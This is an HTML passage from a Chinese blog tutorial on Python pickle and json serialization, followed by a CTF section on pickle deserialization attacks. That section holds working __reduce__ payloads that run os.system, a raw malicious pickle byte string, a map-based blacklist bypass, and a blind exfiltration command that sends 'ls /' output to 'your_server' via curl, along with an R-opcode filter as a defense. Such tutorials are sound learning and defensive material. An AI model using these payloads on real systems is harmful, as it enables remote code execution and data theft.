pickle.dumps(p)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(pp))<br><span class="hljs-built_in">print</span>(pp)<br>p2 = pickle.loads(pp)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p2))<br><span class="hljs-built_in">print</span>(p2.name)   <span class="hljs-comment"># 可以直接访问对象的键的值</span><br><br><span class="hljs-comment"># 使用pickle对Person类本身进行序列化</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;使用pickle对Person类本身进行序列化&quot;</span>)<br>per = pickle.dumps(Person)<br><span class="hljs-built_in">print</span>(per)<br>per2 = pickle.loads(per)<br><span class="hljs-built_in">print</span>(per2)<br></code></pre></td></tr></table></figure>

<p>尝试使用<strong>json</strong>对Person实例化对象进行序列化，会发现其报错了，报错信息指出：Person对象不是json可序列化的。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913171854479.png" srcset="/img/loading.gif" lazyload alt="image-20240913171854479"></p>
<p>如果<strong>非得使用json</strong>对Person类对象进行序列化的话，那就必须<strong>先定义一个将Person对象转化为字典dict的方法</strong>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 定义将Person对象转换为字典dict的方法</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">person2dict</span>(<span class="hljs-params">per</span>):<br>    <span class="hljs-keyword">return</span> &#123;<br>        <span class="hljs-string">&#x27;name&#x27;</span>: per.name,<br>        <span class="hljs-string">&#x27;age&#x27;</span>: per.age,<br>        <span class="hljs-string">&#x27;isMarried&#x27;</span>: per.isMarried<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>尝试使用json对其进行序列化。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python">p3 = json.dumps(p, default=person2dict)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p3))<br><span class="hljs-built_in">print</span>(p3)  <span class="hljs-comment"># 发现能成功序列化，但是中文部分是乱码，那就添加ensure_ascii=False参数</span><br>p3 = json.dumps(p, default=person2dict, ensure_ascii=<span class="hljs-literal">False</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p3))<br><span class="hljs-built_in">print</span>(p3)  <span class="hljs-comment"># 解决中文乱码问题</span><br></code></pre></td></tr></table></figure>

<p>注意到，这里使用dumps进行序列化的时候使用到了 <strong>default</strong> 参数指定了person2dict(per)转换方法。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913192823254.png" srcset="/img/loading.gif" lazyload alt="image-20240913192823254"></p>
<p>对default参数的说明如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913214433981.png" srcset="/img/loading.gif" lazyload alt="image-20240913214433981"></p>
<blockquote>
<p>default(obj) 这个参数简单的解决了类型错误的问题。应该能返回obj对象的可被序列化版本或者引发TypeError，进而执行dumps序列化操作。</p>
</blockquote>
<p>既然使用json对Person对象进行序列化不能直接进行，需要编写一个类型转换方法，那么使用json进行反序列化的时候也不能直接对json 序列化的结果进行操作。若直接对json 序列化结果进行反序列化，结果会得到一个dict对象，而不是我们想要的Person对象。</p>
<p>所以需要先编写一个由dict对象转换为Person对象的功能方法：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">dict2Person</span>(<span class="hljs-params">d</span>):<br>    <span class="hljs-keyword">return</span> Person(d[<span class="hljs-string">&#x27;name&#x27;</span>], d[<span class="hljs-string">&#x27;age&#x27;</span>], d[<span class="hljs-string">&#x27;isMarried&#x27;</span>])<br></code></pre></td></tr></table></figure>

<p>然后进行反序列化操作：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">p5 = json.loads(p3, object_hook=dict2Person)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">type</span>(p5))<br><span class="hljs-built_in">print</span>(p5.name)<br></code></pre></td></tr></table></figure>

<p>可以发现，在进行loads反序列化的时候，使用了 <strong>object_hook</strong> 参数承接了外部自定义的dict2Person(d)方法。</p>
<p>同样追溯到loads函数的声明处查看：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240913220237278.png" srcset="/img/loading.gif" lazyload alt="image-20240913220237278"></p>
<blockquote>
<p>object_hool，是一个可选的功能，能对任何类型的返回结果进行再解码，可以理解为强制转换。也就是说，传入的方法函数用于处理loads原本的返回值，并最后作为loads的返回值赋值给左边的变量。</p>
</blockquote>
<p>但要是我们每次遇到一个类，且json无法对该类以及类对象直接进行序列化的时候，我们都要分别写一个转换函数来实现序列化和反序列化操作吗？</p>
<p>这样的编程思路是繁琐的且浪费时间的。有什么方法呢？</p>
<p>答：<strong>可以通过default参数构造，把任意类的实例对象变为dict</strong></p>
<blockquote>
<p><code>json.dumps(class obj, default=lambda obj: obj.__dict__)</code>	</p>
</blockquote>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914103831775.png" srcset="/img/loading.gif" lazyload alt="image-20240914103831775"></p>
<h3 id="pickletools调试器"><a href="#pickletools调试器" class="headerlink" title="pickletools调试器"></a>pickletools调试器</h3><p>pickletools是python自带的pickle调试器，有三个功能：</p>
<p><strong>反汇编</strong>一个已经被打包的字符串：解析字符串，表明该字符串都干了些啥，反汇编结果的<strong>每一行都是一条指令</strong>。</p>
<p><strong>优化</strong>一个已经被打包的字符串：其实就是把不必要的<code>PUT</code>指令删除掉。</p>
<p><strong>返回</strong>一个迭代器来供程序使用</p>
<p>通常使用前两种。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> pickletools<br><br>p = pickle.dumps(obj)<br><span class="hljs-comment"># 反汇编功能</span><br>pickletools.dis(p)<br><span class="hljs-comment"># 优化功能</span><br>pickletools.optimize(p)<br></code></pre></td></tr></table></figure>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>1、pickle序列化的结果为bites类型，只适合于Python机器之间的交互。</p>
<p>2、json序列化结果为str类型，能够被多种语言识别，可用于与其它程序设计语言交互。</p>
<p>3、目前，json格式字符串已经成为网络传输中的一种标准格式，所以再web开发后台开发中通常使用json模块来序列化而不是pickle模块。</p>
<p>4、对pickle进行一些补充：</p>
<p>pickle库为python对象提供了一种方便的持久化方式。通过pickle可以轻松地存储任何复杂的python对象，并在之后重新加载它们。但是pickle并不适用于所有对象，某些对象可能无法被序列化，或者在反序列化时会丢失一些信息。</p>
<p>因此，处于安全考虑，最好不要从不可信的源加载pickle数据，因为反序列化过程可能会执行不安全的代码。</p>
<h2 id="pickle-CTF利用"><a href="#pickle-CTF利用" class="headerlink" title="pickle-CTF利用"></a>pickle-CTF利用</h2><h3 id="reduce-反序列化攻击"><a href="#reduce-反序列化攻击" class="headerlink" title="__reduce__反序列化攻击"></a><code>__reduce__</code>反序列化攻击</h3><p>​	<code>__reduce__</code>方法的指令码是<code>R</code>，主要功能是：</p>
<p>· 取当前栈的栈顶记为<code>args</code>，然后把它弹掉</p>
<p>· 取当前栈的栈顶记为<code>f</code>，然后把它弹掉</p>
<p>· 以<code>args</code>为参数，执行函数<code>f</code>，把结果压进当前栈</p>
<ul>
<li><p>类class的<code>__reduce__</code>方法，在<strong>pickle反序列化的时候</strong>会被执行。其底层的编程方法就是利用了<code>R</code>指令码，<code>f</code>要么返回字符串，要么返回一个tuple，后者对我们而言更有用。</p>
</li>
<li><p>一种流行的<strong>攻击思路</strong>是：</p>
</li>
</ul>
<blockquote>
<p>利用<code>__reduce__</code>构造恶意字符串，当这个字符串被反序列化的时候，<code>__reduce__</code>会被执行。</p>
</blockquote>
<ul>
<li><code>__reduce__</code>反序列化攻击实操</li>
</ul>
<p>假设：正常的字符串被反序列化后得到了一个Person对象，那么，我们想要构造一个字符串，让它在反序列化的时候，执行<code>ls</code>指令，列出当前目录下的所有文件。</p>
<p>需要进行如下代码设计：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> pickletools<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, name, age, isMarried</span>):<br>        self.name = name<br>        self.age = age<br>        self.isMarried = isMarried<br><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">return</span> (os.system, (<span class="hljs-string">&#x27;ls /&#x27;</span>,))<br><br><br>payload = pickle.dumps(Person(<span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-number">30</span>, <span class="hljs-literal">False</span>))<br>payload = pickletools.optimize(payload)<br><br><span class="hljs-built_in">print</span>(payload)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;反汇编结果如下：&quot;</span>)<br><span class="hljs-built_in">print</span>(pickletools.dis(payload))<br></code></pre></td></tr></table></figure>

<p>注意！在<code>__reduce__</code>方法内部，括号括起来的待执行命令字符串后面有一个逗号！这是不可少的。</p>
<p>程序的执行结果如下：</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914162139325.png" srcset="/img/loading.gif" lazyload alt="image-20240914162139325"></p>
<p>payload的值为：</p>
<blockquote>
<p>b’\x80\x04\x95\x16\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x8c\x06system\x93\x8c\x04ls &#x2F;\x85R.’</p>
</blockquote>
<p>现在将其中的<code>__reduce__</code>方法去除，然后尝试对上述payload进行反序列化。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914163928577.png" srcset="/img/loading.gif" lazyload alt="image-20240914163928577"></p>
<p>这里出现了一个问题，显示ls不是内部或外部命令。啧啧啧，回忆一下ls指令一般是在什么场景下用的。不一般都是在kali linux系统使用的吗？所以合理怀疑是系统指令不兼容的原因导致的报错。</p>
<p>windows下列出当前文件目录的指令是<code>dir</code></p>
<p>修改指令后再次进行尝试：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, name, age, isMarried</span>):<br>        self.name = name<br>        self.age = age<br>        self.isMarried = isMarried<br><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">return</span> (os.system, (<span class="hljs-string">&#x27;dir&#x27;</span>,))<br><br><span class="hljs-comment"># 序列化</span><br>payload = pickle.dumps(Person(<span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-number">30</span>, <span class="hljs-literal">False</span>))<br>payload = pickletools.optimize(payload)<br><br><span class="hljs-built_in">print</span>(payload)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;反汇编结果如下：&quot;</span>)<br><span class="hljs-built_in">print</span>(pickletools.dis(payload))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;反序列化&quot;</span>)<br>res = pickle.loads(payload)<br><span class="hljs-built_in">print</span>(res)<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240914225108471.png" srcset="/img/loading.gif" lazyload alt="image-20240914225108471"></p>
<p>结果显示，执行反序列化操作的时候，会顺带执行<code>__reduce__</code>方法中构造的命令。</p>
<p>在实际的攻击中，目标类的方法可能没有定义有<code>__reduce__</code>方法，那么我们应该如何操作呢？</p>
<p>我们可以构造带有<code>__reduce__</code>方法（包含目标指令）的序列化格式串，然后作为输入值输入到反序列化函数中让其解析，进行执行恶意命令。</p>
<p>进行尝试：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">Person</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self, name, age, isMarried</span>):<br>        self.name = name<br>        self.age = age<br>        self.isMarried = isMarried<br><br>res = pickle.loads(<span class="hljs-string">b&#x27;\x80\x04\x95\x15\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x8c\x06system\x93\x8c\x03dir\x85R.&#x27;</span>)<br><span class="hljs-built_in">print</span>(res)<br></code></pre></td></tr></table></figure>

<p>payload的值是序列化生成的bites数据。输入payload直接进行反序列化操作，根据结果可以得知能够成功解析并执行了目标指令。</p>
<p>既然<code>__reduce__</code>方法在反序列化中这么不安全，那么我们可以尝试过滤掉<code>__reduce__</code>。</p>
<h3 id="过滤-reduce"><a href="#过滤-reduce" class="headerlink" title="过滤__reduce__"></a>过滤<code>__reduce__</code></h3><h4 id="过滤方法"><a href="#过滤方法" class="headerlink" title="过滤方法"></a>过滤方法</h4><ul>
<li>过滤<code>__reduce__</code>的方式之禁止<code>R</code>操作码</li>
</ul>
<blockquote>
<p>由于<code>__reduce__</code>方法对应的操作码是<code>R</code>，所以只需要把操作码<code>R</code>过滤掉即可。这个效果可以方便地利用<code>pickletools.genops</code>来实现。</p>
</blockquote>
<p>实地操作的话，大致操作如下：</p>
<p>需要注意的是，优化过程可能会将一些不必要的操作码过滤掉。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = pickle.dumps(Person(<span class="hljs-string">&#x27;张三&#x27;</span>, <span class="hljs-number">30</span>, <span class="hljs-literal">False</span>))<br><br>optimize_payload = pickletools.optimize(payload)<br><br>liter = pickletools.genops(payload)<br><br><span class="hljs-keyword">for</span> li <span class="hljs-keyword">in</span> liter:<br>    opcode, arg1, arg2 = li<br>    <span class="hljs-keyword">if</span> opcode.name == <span class="hljs-string">&#x27;R&#x27;</span>:<br>        <span class="hljs-built_in">print</span>(li)<br></code></pre></td></tr></table></figure>

<p><code>genops</code>返回的是一个包含多个成员的元组的迭代器。通过直接打印确认成员的数目，如下，可以确定其是包含了<code>OpcodeInfo</code>对象和两个附加值的元组。<code>OpcodeInfo</code>对象表示pickle操作码的信息，包括操作码（R、GLOBAL等）以及其它附加的参数或数据。</p>
<p><img src="https://cdn.jsdelivr.net/gh/haoisbinlove/Blogimage@main/image/image-20240915134111860.png" srcset="/img/loading.gif" lazyload alt="image-20240915134111860"></p>
<h4 id="过滤前提下的利用"><a href="#过滤前提下的利用" class="headerlink" title="过滤前提下的利用"></a>过滤前提下的利用</h4><ul>
<li>过滤<code>__reduce__</code>的方式之不禁止<code>R</code>操作码，但对<code>R</code>执行的函数有黑名单限制</li>
</ul>
<p>有一些CTF题目，会给一些有关函数执行的黑名单，比如禁用open、file、os.system、eval、compile等函数。</p>
<p>我们要如何绕过这种名单限制成功利用这个<code>__reduce__</code>反序列化漏洞呢？</p>
<p>一方面，尽管有函数执行的黑名单，但是总会有漏网之鱼，但是这种一般是不常见的。</p>
<p>另一方面，可以利用<code>map</code>来实现。</p>
<blockquote>
<p>利用方式：<code>map</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">Exploit</span>(<span class="hljs-title class_ inherited__">object</span>):<br> <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>	<span class="hljs-keyword">return</span> <span class="hljs-built_in">map</span>,(os.system,[<span class="hljs-string">&quot;dir&quot;</span>])<br></code></pre></td></tr></table></figure>
</blockquote>
<ul>
<li>过滤<code>__reduce__</code>的方式之彻底过滤了<code>R</code>指令码（只要见到payload里有<code>R</code>这个字符，就直接驳回）</li>
</ul>
<blockquote>
<p>使用场景：给出一个字符串，反序列化之后，name和grade需要与blue module里面的name、grade相对应。</p>
<p>利用方式：<code>全局变量包含：妙用c指令码</code></p>
<p>更多操作参考下面的文章:</p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/89132768">从零开始python反序列化攻击：pickle原理解析 &amp; 不用reduce的RCE姿势</a></p>
</blockquote>
<h3 id="一些细节"><a href="#一些细节" class="headerlink" title="一些细节"></a>一些细节</h3><ul>
<li>其它模块的load也可以触发pickle反序列化漏洞</li>
</ul>
<p>比如, <code>numpy.load()</code>,先尝试以numpy自己的数据格式导入,如果失败,则尝试以pickle的格式导入。但<code>numpy.load()</code>是可以触发pickle反序列化漏洞的。</p>
<ul>
<li>即使代码中没有<code>import os</code>，GLOBAL指令也可以自动导入<code>os.system</code></li>
</ul>
<p>所以，不能认为没有在代码里导入os库，pickle反序列化的时候就不能执行os.system了。</p>
<ul>
<li>即使没有回显，也可以方便地调试恶意代码</li>
</ul>
<p>只要拥有一台公网服务器，执行：</p>
<blockquote>
<p>os.system(‘curl your_server&#x2F;<code>ls / | base64</code>‘)</p>
</blockquote>
<p>然后查询自己的服务器日志，就能看到结果了。原因是：以” &#96; “引号包含的代码，在sh中会直接执行，返回其结果。</p>
<p>总而言之，对于防守方来说，若想禁用<code>__reduce__</code>这套方法，最稳妥的方法还是禁止<code>R</code>指令操作码。</p>
<blockquote>
<p>更多资料：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/tdl320721/article/details/133827636">python实现protobuf序列化与反序列化</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/361349643">pickle反序列化的利用技巧总结</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436?time__1311=n4+xnD0Dy7GQDt=G=GCDlhjecQhiWeWNHe4D">pickle反序列化初探</a></p>
</blockquote>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>python-序列化与反序列化</div>
      <div>https://haoisbinlove.github.io/2024/09/13/python序列化与反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Sweety</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年9月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/08/12/DC-8/" title="DC-8">
                        <span class="hidden-mobile">DC-8</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
